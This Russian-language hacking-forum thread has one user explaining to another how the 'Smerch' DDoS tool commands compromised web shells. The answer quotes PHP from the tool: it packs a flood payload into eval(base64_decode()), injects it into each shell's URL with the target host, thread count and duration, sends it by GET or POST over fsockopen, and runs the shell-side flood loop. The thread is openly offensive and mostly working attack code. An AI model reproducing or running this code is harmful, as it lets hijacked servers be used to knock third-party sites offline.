Помогите пожалуйсто мне, подскажите как отправляет smerch (тот что для DDoS) команды (содержимое модулей ддоса) на шеллы ?
Буду благодарен, обьязательно дам плюсик
Буду благодарен, обьязательно дам плюсик
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Отправка кода на шелл...
- Автор темы DiegO
- Дата начала
Для смерша используются шелы remview или c99shell
- Автор темы
- Добавить закладку
- #3
Ar3s мне ни как добавлять, а как вообще скрипт смерча на шелл команды отправляет...
DiegO, берет шеллы из списка адресов сайтов с шеллами, которые поддерживают удаленное выполнение php-кода. Затем шлет на них кастомный код (способ отправки описан в том же файле со списком шеллов), выполняющий DoS, закодированный в base64 в теле GET-а или POST-а (в зависимости от типа шелла) вместе с адресом сайта-цели и прочими параметрами, описывающими атаку. Шелл на той стороне его (код) принимает и исполняет, (сам код вытаскивает параметры) и совершая таким образом атаку.
Нужны подробности?
Нужны подробности?
- Автор темы
- Добавить закладку
- #5
DASM32 смотрел в сорца я не чё не понял, можешь дать кусочек php кода как он шлёт на шеллы модули ддоса
DiegO, у меня версия Smerch 0.2. Куски из index.php:
Вот два параметра, файл со списком шеллов и файл с php-кодом, выполняющим собственно DoS (его сразу считываем в $death_code)
Загружаем массив с адресами шеллов и их параметрами (куда вставлять код и т.д.) в массив $db
Если пользователь хочет провести атаку,
Берем считанный нами php DoS-код, укорачиваем его, удаляем все лишнее (с сохранением работоспособности, естессно)
Кодируем его в base64 и "заворачиваем" в eval сразу
Затем начинается самое интересное - отсылка кода. Пробегаемся по массиву с шеллами
Формируем переменную $url, которая будет содержать адрес шелла и все необходимые данные (код, параметры атаки и т.д.). Она будет являть собой GET-запрос.
Соответсвенно сам адрес шелла в servers.dat имеет примерно такой формат:
Соответственно {death_code} мы и заменяем на наш код. Условие таково, что шелл на той стороне должен "понимать", что в параметре php ему пришло то, что нужно выполнить в виде php-кода.
Итак, парсим полученный $url в массив $a_url (в котором будут уже отдельно имя хоста, порт, путь к скрипту и отдельно текст запроса), чтобы иметь возможность если нужно, отослать данные не в GET, а в POST
Пытаемся открыть соединение к очередному шеллу при помощи fsockopen
И посылаем на него собственно все что нам нужно - GET-ом или POST-ом, в зависимости от данных, описывающих шелл, и хранящихся в том же servers.dat. POST:
GET:
Вот и все. Шелл на той стороне наш код принимает и выполняя сначала base64, а потом eval (это мы так и отправили), выполняет сию полезную нагрузку.
Сама нагрузка(dos_script_noproxy.php) вытаскивает из параметров, пришедших вместе с ней адрес атакуемого хоста, время атаки и т.д.:
И начинает собственно атаку с этими параметрами:
Вот два параметра, файл со списком шеллов и файл с php-кодом, выполняющим собственно DoS (его сразу считываем в $death_code)
Код:
$server_file = "./servers.dat";
$death_code = file_get_contents("./dos_script_noproxy.php");
Код:
$db = @unserialize(file_get_contents($server_file));
Код:
elseif ($F['doattack'] || $F['docheck']) # - команда на атаку.
Код:
# - Пакуем код...
$death_code = preg_replace("/\<"."\?(.+)\?"."\>/is", "\\1", $death_code); // нах не нужны php iden
$death_code = preg_replace("/\#([^\n\r]+)/is", "", $death_code);// - комменты нахуй.
$death_code = str_replace(array("\n", "\r", "\t", " "), "", $death_code); // тоже нах.
$death_code = preg_replace("/\;\s+/is", ";", $death_code);
Код:
$death_code = urlencode("eval(base64_decode('".base64_encode($death_code)."'));");
Код:
foreach ($db as $key=>$row)
{
Код:
$url = $row['url'];
$url = str_replace("{death_code}", $death_code ,$url);
$url = str_replace("{death_url}", $death_url ,$url);
$url.= "&_DDOZU_=$F[dohost]&_DDOZC_=$F[socount]&_DDOZS_=$F[sleep]&_DDOZT_=$F[time]";
Код:
http://www.example.com/shell.php?php={death_code}Итак, парсим полученный $url в массив $a_url (в котором будут уже отдельно имя хоста, порт, путь к скрипту и отдельно текст запроса), чтобы иметь возможность если нужно, отослать данные не в GET, а в POST
Код:
$url_a = parse_url($url);
Код:
if (!$socket = fsockopen($url_a['host'], 80,$s,$s,5)){ $db[$key]['state'] = "<FONT color=red>Can't connect!</FONT>"; continue;}
Код:
if (!$row['senttype'])
{
fputs($socket, "POST http://$url_a[host]$url_a[path] HTTP/1.1\r\n");
fputs($socket, "Content-Type: application/x-www-form-urlencoded \r\n");
fputs($socket, "Host: $url_a[host]\r\n");
fputs($socket, "Content-length: ".strlen($url_a['query'])."\r\n");
fputs($socket, "Connection: close\r\n");
fputs($socket, "\r\n");
fputs($socket, "$url_a[query]");
Код:
}else
{
fputs($socket, "GET http://$url_a[host]$url_a[path]?$url_a[query] HTTP/1.1\r\n");
fputs($socket, "Content-Type: application/x-www-form-urlencoded \r\n");
fputs($socket, "Host: $url_a[host]\r\n");
fputs($socket, "Connection: close\r\n\r\n");
}Вот и все. Шелл на той стороне наш код принимает и выполняя сначала base64, а потом eval (это мы так и отправили), выполняет сию полезную нагрузку.
Сама нагрузка(dos_script_noproxy.php) вытаскивает из параметров, пришедших вместе с ней адрес атакуемого хоста, время атаки и т.д.:
Код:
$F = $_GET + $_POST;
$a = array('url'=>$F['_DDOZU_'],'count'=>$F['_DDOZC_'],'time'=>$F['_DDOZT_'],'sleep'=>$F['_DDOZS_'],'debug'=>$F['debug']);
Код:
while(true){ simple_flood($a['url'], $a['count'], $a['sleep'], $a['debug']); sleep(1);if(($diet)&&(time()>$diet)) exit;}
function simple_flood($url, $so_count,$sleep,$debug = 0)
{
... // (текст функции опущен)- Автор темы
- Добавить закладку
- #7
Спсибо большое, теперь то я начинаю понимать, после того как ты мне всё понятно обьяснил.
Держи +
Держи +